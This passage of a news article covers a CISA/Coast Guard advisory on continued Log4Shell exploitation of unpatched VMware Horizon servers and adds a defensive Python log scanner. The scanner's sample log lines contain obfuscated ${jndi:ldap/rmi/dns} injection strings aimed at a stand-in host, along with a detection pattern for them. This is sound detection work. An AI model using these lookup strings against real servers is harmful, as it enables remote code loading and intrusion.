In December 2021, VMware released patches for Log4Shell, a vulnerability in a popular Java framework that left countless servers at risk. Yet the Cybersecurity and Infrastructure Security Agency (CISA) and US Coast Guard Cyber Command (CGCYBER) say that hackers continue to exploit the vulnerability more than six months after those patches were made available.
The agencies say in a joint Cybersecurity Advisory published on June 23 that "cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds."
CISA and CGCYBER say at least some targeted organizations have been infected with malware the hackers could use in conjunction with their command and control infrastructure. "In one confirmed compromise," the agencies say, "these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data."
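One check a defender reading this will want is whether exploitation attempts against CVE-2021-44228 are showing up in their own web or application logs. The following is an added example, not code from the article, the advisory, or VMware: a small Python scanner that undoes the common lookup obfuscations (`${lower:...}`, `${upper:...}`, and the `${...:-x}` default-value form) and then flags any line that still contains a `${jndi:` lookup. The log lines, IP addresses (TEST-NET ranges) and paths are constructed for the example and are not real indicators from the advisory.

```python
import re

# Constructed sample log lines (not from the advisory or the article). The
# first three imitate lookup strings planted in a request header; the last two
# are benign, including a harmless non-jndi lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '198.51.100.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal HTTP/1.1" 200 '
    '"User-Agent: ${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.6 - - [23/Jun/2022:10:01:03 +0000] "GET /portal HTTP/1.1" 200 '
    '"User-Agent: ${${lower:j}ndi:rmi://203.0.113.10:1099/b}"',
    '198.51.100.7 - - [23/Jun/2022:10:01:04 +0000] "GET /portal HTTP/1.1" 200 '
    '"User-Agent: ${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/c}"',
    '198.51.100.8 - - [23/Jun/2022:10:01:05 +0000] "GET /portal HTTP/1.1" 200 '
    '"User-Agent: Mozilla/5.0"',
    '198.51.100.9 - - [23/Jun/2022:10:01:06 +0000] "GET /portal?q=${date:yyyy} HTTP/1.1" 200 "-"',
]

# ${lower:X} / ${upper:X} wrap a single fragment so the literal "jndi" never
# appears in the raw request; both collapse to the fragment itself.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)

# ${name:-default} resolves to the default when the lookup fails; the
# degenerate ${::-j} form therefore evaluates to just "j".
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")

# After normalisation the lookup is spelled out, so a plain pattern suffices.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Repeatedly collapse nested obfuscation lookups from the inside out.

    Both regexes exclude braces, so they only ever match an innermost lookup;
    looping until the text stops changing unwinds arbitrary nesting.
    """
    prev = None
    while prev != text:
        prev = text
        text = CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def is_jndi_lookup_attempt(line: str) -> bool:
    """True if the line contains a ${jndi:...} lookup once de-obfuscated."""
    return JNDI_PATTERN.search(normalize_lookups(line)) is not None


def scan_log(lines):
    """Return (index, normalised_line) pairs for every suspicious line."""
    hits = []
    for idx, line in enumerate(lines):
        if is_jndi_lookup_attempt(line):
            hits.append((idx, normalize_lookups(line)))
    return hits


if __name__ == "__main__":
    for idx, shown in scan_log(SAMPLE_LOG_LINES):
        print(f"line {idx}: {shown}")
```

The normalisation step is what makes this useful for triage: the first sample is obvious, but the second and third only reveal `${jndi:` after the wrapper lookups are unwound, which is exactly how the detection in many SIEM rules for this CVE works. It is a triage aid, not a substitute for the patches the article describes; a regex can only catch the obfuscation forms it knows about, so a hit means "investigate this host", and a clean scan does not mean the server was never reached.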
This isn't the first time we've been warned about hackers targeting VMware Horizon servers that remain susceptible to Log4Shell. Huntress, a security company founded by former National Security Agency (NSA) hackers, said in January that attackers were exploiting that vulnerability to install the popular Cobalt Strike command and control framework on victims' networks.
"For those of you just learning about the mass exploitation of VMware Horizon servers and the installation of backdoor web shells," Huntress said at the time, "you should seriously consider the possibility that your server is
Read more on pcmag.com